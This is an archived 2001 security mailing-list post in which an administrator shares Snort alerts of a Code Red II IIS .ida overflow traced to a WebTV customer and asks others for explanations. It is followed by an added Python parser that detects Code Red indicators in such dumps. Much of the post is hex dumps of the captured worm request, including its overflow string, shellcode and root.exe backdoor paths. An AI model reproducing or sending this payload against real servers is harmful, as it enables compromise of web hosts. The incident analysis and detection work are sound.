Code Red - Kind of interesting actually

From: Keith Pachulski (Keith.Pachulskiat_private)
Date: Mon Aug 27 2001 - 13:15:29 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    While the following dumps seem all too familiar by now, keep reading,
    as the source of these is an unlikely one.
    
    [**] IDS552 web-iis_IIS ISAPI Overflow ida [**]
    08/10-13:39:51.066030 204.x.x.x:1735 -> 204.x.x.x:80
    TCP TTL:125 TOS:0x0 ID:12845 IpLen:20 DgmLen:1500 DF
    ***A**** Seq: 0x8246A40B  Ack: 0x49256627  Win: 0x2238  TcpLen: 20
    47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
    3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  X%u9090%u6858%uc
    62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
    75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
    31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
    62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
    75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
    33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
    33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
    75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
    50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
    79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F  ype: text/xml.Co
    6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33  ntent-length: 33
    37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00  79 ........`....
    00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00  ....dg.6..dg.&..
    E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF  .....h......\...
    50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40  P.U...\...P.U..@
    10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00  .....X....U.=...
    00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6  ....=...........
    C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00  ...T....u..~0...
    00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A  ........F0......
    00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24  ...CodeRedII...$
    FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50  .U.f.....8.....P
    FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50  .......j...P...P
    8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84  ..8...P.E..p....
    00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4  .....8....thS.U.
    FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00  .U..E.i.T...,...
    81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7  ..,.............
    89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00  .F4.E.Pj..u.....
    00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55  ......j.j..U.P.U
    D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00  .Ou..;...i.T....
    5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A  \&....\&.W.U.j.j
    16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45  ..U.j..U....F4)E
    84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0  .jd.U...<...P.U.
    0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7  ...<...=....s...
    85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF  .>......s.f..p..
    FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00  ...f..r....P.d..
    00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8  ...t...j.j.j..U.
    83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80  ...t..E.j.Th~f..
    FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50  .u..U.Yj...p...P
    FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33  .u..U........tK3
    DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF  ..U.=3'..u?..h..
    FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7  .......l........
    85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF  .`........E...d.
    FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF  ....h...Pj...`..
    FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66  .Pj.j..U..j.Th~f
    04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00  ...u..U.Y...u1..
    00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00  ...X-....j.h....
    50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00  P.u..U.=....u.j.
    6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF  j...\...P.u..U..
    75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81  u..U..........w.
    C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00  ..........xu....
    F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06  ..`......d$.dg..
    00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26  ..Xa..dg.6..dg.&
    00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50  ..f.;MZu..K<.<.P
    45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C  E..u..T.x...B..<
    03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75  .KERNu..|..EL32u
    BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47  .3.I.r ...A..<.G
    65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03  etPu..|..rocAu..
    4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03  J.I...J$........
    4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00  J.......D$$dg...
    00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8  .Xa..Q....]..E..
    0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41  ....LoadLibraryA
    00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43  ..u..U..E......C
    72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF  reateThread..u..
    55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63  U..E......GetTic
    6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC  kCount..u..U..E.
    E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55  .....Sleep..u..U
    F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74  ..E......GetSyst
    65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00  emDefaultLangID.
    FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65  .u..U..E......Ge
    74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79  tSystemDirectory
    41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00  A..u..U..E......
    43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8  CopyFileA..u..U.
    89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69  .E......GlobalFi
    6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45  ndAtomA..u..U..E
    D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41  ......GlobalAddA
    74 6F 6D 41                                      tomA
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    =+=+
    [**] IIS CodeRed v2 overflow root.exe [**]
    08/10-13:39:51.343109 204.x.x.x:1735 -> 204.x.x.x:80
    TCP TTL:125 TOS:0x0 ID:12846 IpLen:20 DgmLen:1500 DF
    ***A**** Seq: 0x8246A9BF  Ack: 0x49256627  Win: 0x2238  TcpLen: 20
    00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43  ..u..U..E......C
    6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55  loseHandle..u..U
    F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74  ..E......_lcreat
    00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F  ..u..U..E......_
    6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8  lwrite..u..U..E.
    E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC  ....._lclose..u.
    FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79  .U..E......GetSy
    73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89  stemTime..u..U..
    45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C  E......WS2_32.DL
    4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63  L..U..E......soc
    6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00  ket..u..U..E....
    00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75  ..closesocket..u
    BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74  ..U..E......ioct
    6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45  lsocket..u..U..E
    A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75  ......connect..u
    BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65  ..U..E......sele
    63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00  ct..u..U..E.....
    00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8  .send..u..U..E..
    05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89  ....recv..u..U..
    45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61  E......gethostna
    6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00  me..u..U..E.....
    00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF  .gethostbyname..
    75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41  u..U..E......WSA
    47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC  GetLastError..u.
    FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33  .U..E......USER3
    32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00  2.DLL..U..E.....
    00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF  .ExitWindowsEx..
    75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84  u..U..E...E.i...
    08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1  ..@.E....xV4....
    C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3  ........<.t.<.t.
    C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1  ................
    E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8  ................
    E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF  ......... ......
    FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF  ................
    FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04  .............Y..
    81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F  .#...#.X........
    74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3  t....t.;.X...t..
    68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D  h......\...P.U..
    BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E  ..\........\CMD.
    45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00  EXE.^.....cj....
    00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72  ..d:\inetpub\scr
    69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C  ipts\root.exe...
    24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8  $....\...P.U.j..
    2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C  +...d:\progra~1\
    63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C  common~1\system\
    4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B  MSADC\root.exe..
    0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA  .$....\...P.U...
    05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
    FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC  ............@...
    00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
    01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0  ....*%).........
    00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00  ................
    00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00  ............ ...
    00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00  .@..............
    00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00  ............@...
    04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00  ................
    20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10   ...............
    00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C  ............0...
    01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10  ................
    00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00  ................
    00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00  .......... ..`..
    00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04  ........... ....
    00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10  ..@.............
    00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00  ...0............
    00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC  ..........@.....
    FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
    FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
    FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00  ................
    00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68  ..........h....h
    D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE  . @..a...... @..
    00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8  . @.....j.h. @..
    4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31  L........h.'...1
    01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A  .....h.$@.h?...j
    00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00  .h. @.h.....2...
    0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68  ..u&j.hT @.j.j.h
    48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF  H @..5.$@.......
    35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68  5.$@......h.$@.h
    3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80  ?...j.hX @.h....
    E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C  .......uU.. @..L
    00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68  ..... @..B...j.h
    B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8  . @.j.j.h. @..5.
    24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A  $@......j.h. @.j
    01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99  .j.h. @..5.$@...
    00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7  ....5.$@........
    05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0  ..$@.....h.$@.h.
    20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40   @.h.$@.j.U.5.$@
    00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B  ..`.....uI..$@..
    C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81  .t@.. @..>.t6Ff.
    7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20  ~.,,u...217.... 
    40 00 89 35                                      @..5
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    =+=+
    
    Once the requests triggered the IDS, they were traced back to a user
    on our network. The user is a customer of WebTV. Checking on the
    HiPerARC verified this via the login information.
    
    100a63010@webtvf-ip-I3055       IP   slot:8/mod:7    ENA   DYN 
    204.x.x.x/H
    
    While working to a very small degree with Microsoft, they dropped the
    issue, so I for one am left with a puzzle on my hands. While the
    person is using our network equipment to access the net, they are not
    really a customer of ours. I referred this information to Microsoft,
    who would not look into it nor question the customer. I took it upon
    myself to contact the customer. The only real information they were
    able to offer me was that their WebTV box was acting up on the day
    of the detect I had and a few days later; after rebooting the box, the
    customer had no further problems. This is a WebTV device, not WebTV
    for Windows.
    
    Has anyone ever seen anything similar to this, or does anyone have a
    decent explanation besides spoofing or TCP hijacking? Microsoft already
    gave us those, and we have since disregarded them due to our network
    setup.
    
    - -Keith
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.0.4
    
    iQA/AwUBO4qrpuGTq6qVSXTQEQL//wCgolNxyde+hBW9KBedD/W6FHdOb2wAoLAU
    pXmAtCmmBLMgLVzWQM9RaePp
    =PTuG
    -----END PGP SIGNATURE-----
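An added example, not part of Keith's post or of any Snort or SecurityFocus code: a small Python parser for the hex/ASCII payload dump format Snort produced above. It reassembles the bytes from a few non-contiguous rows excerpted from the dump in the post, pulls the request line apart, decodes the IIS-only `%uNNNN` escapes that carry the overflow bytes through the URL decoder, and checks the body for the `CodeRedII` marker string. The function names, the `FILLER_ALERT` threshold and the verdict strings are my own choices.

```python
import re

# Non-contiguous rows excerpted from the Snort payload dump in the post above:
# the request line, the start of the "X" filler, the %u-encoded part of the
# query, the headers and the row carrying the "CodeRedII" marker.
SAMPLE_DUMP = """\
47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  X%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F  ype: text/xml.Co
6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33  ntent-length: 33
00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24  ...CodeRedII...$
"""

HEX_COL = 48  # 16 bytes * ("XX" + " "); the ASCII column starts after this
HEX_BYTE = re.compile(r"[0-9A-Fa-f]{2}")
PCT_U = re.compile(r"%u([0-9A-Fa-f]{4})")  # IIS %uNNNN escape, not RFC percent-encoding
FILLER_ALERT = 200  # assumption: long enough to overrun the .ida buffer (the dump above carries 224)


def parse_snort_dump(text: str) -> bytes:
    """Reassemble payload bytes from Snort's 'hex  ascii' rows.

    Only the fixed-width hex column is read, so ASCII in the right-hand
    column that happens to look like hex cannot be misparsed. Rows that are
    not payload (alert headers, separators, blanks) are skipped, and the
    indentation the mail archive adds in front of each row is tolerated.
    """
    out = bytearray()
    for line in text.splitlines():
        tokens = line.lstrip()[:HEX_COL].split()
        if not tokens or not all(HEX_BYTE.fullmatch(t) for t in tokens):
            continue
        out.extend(int(t, 16) for t in tokens)
    return bytes(out)


def decode_percent_u(s: str) -> list:
    """Return the 16-bit values carried by %uNNNN escapes, in order.
    A truncated escape such as the trailing '%u00=a' is ignored."""
    return [int(m.group(1), 16) for m in PCT_U.finditer(s)]


def analyze_request(payload: bytes) -> dict:
    """Split the request line and collect the indicators a Code Red
    .ida overflow leaves in the URL and the body."""
    head = payload.split(b"\r\n\r\n", 1)[0]
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split()
    if len(parts) < 2:
        return {"http": False, "coderedii_marker": b"CodeRedII" in payload}
    method, target = parts[0], parts[1]
    path, _, query = target.partition("?")
    filler = len(query) - len(query.lstrip("X"))  # run of 'X' that pads the overflow
    return {
        "http": True,
        "method": method,
        "path": path,
        "ida_isapi": path.lower().endswith(".ida"),
        "filler_len": filler,
        "unicode_words": decode_percent_u(query),  # 0x9090 is two x86 NOPs
        "coderedii_marker": b"CodeRedII" in payload,
    }


def verdict(info: dict) -> str:
    """Rank the indicators: the marker string is decisive; otherwise flag
    .ida requests that carry a long filler or %u-smuggled bytes."""
    if info["coderedii_marker"]:
        return "Code Red II: CodeRedII marker in payload"
    if info.get("ida_isapi") and (
        info["filler_len"] >= FILLER_ALERT or info["unicode_words"]
    ):
        return "suspicious: .ida ISAPI overflow attempt"
    return "no Code Red indicators"


if __name__ == "__main__":
    info = analyze_request(parse_snort_dump(SAMPLE_DUMP))
    for key, value in info.items():
        if key == "unicode_words":
            value = [hex(w) for w in value]
        print(f"{key}: {value}")
    print(verdict(info))
```

Run as-is, it reports the path `/default.ida`, a 16-byte `X` filler (the excerpt keeps only the first row of it), the decoded words `0x9090 0x6858 0xcbd3 0x7801 0x9090 0x0000`, and the `CodeRedII` marker. Reading only the fixed 48-character hex column is the part worth copying: the ASCII column of a Snort dump routinely contains byte-like text, and a parser that splits the whole row on whitespace will silently append it as data.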

    ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com



    This archive was generated by hypermail 2b30 : Mon Aug 27 2001 - 13:59:21 PDT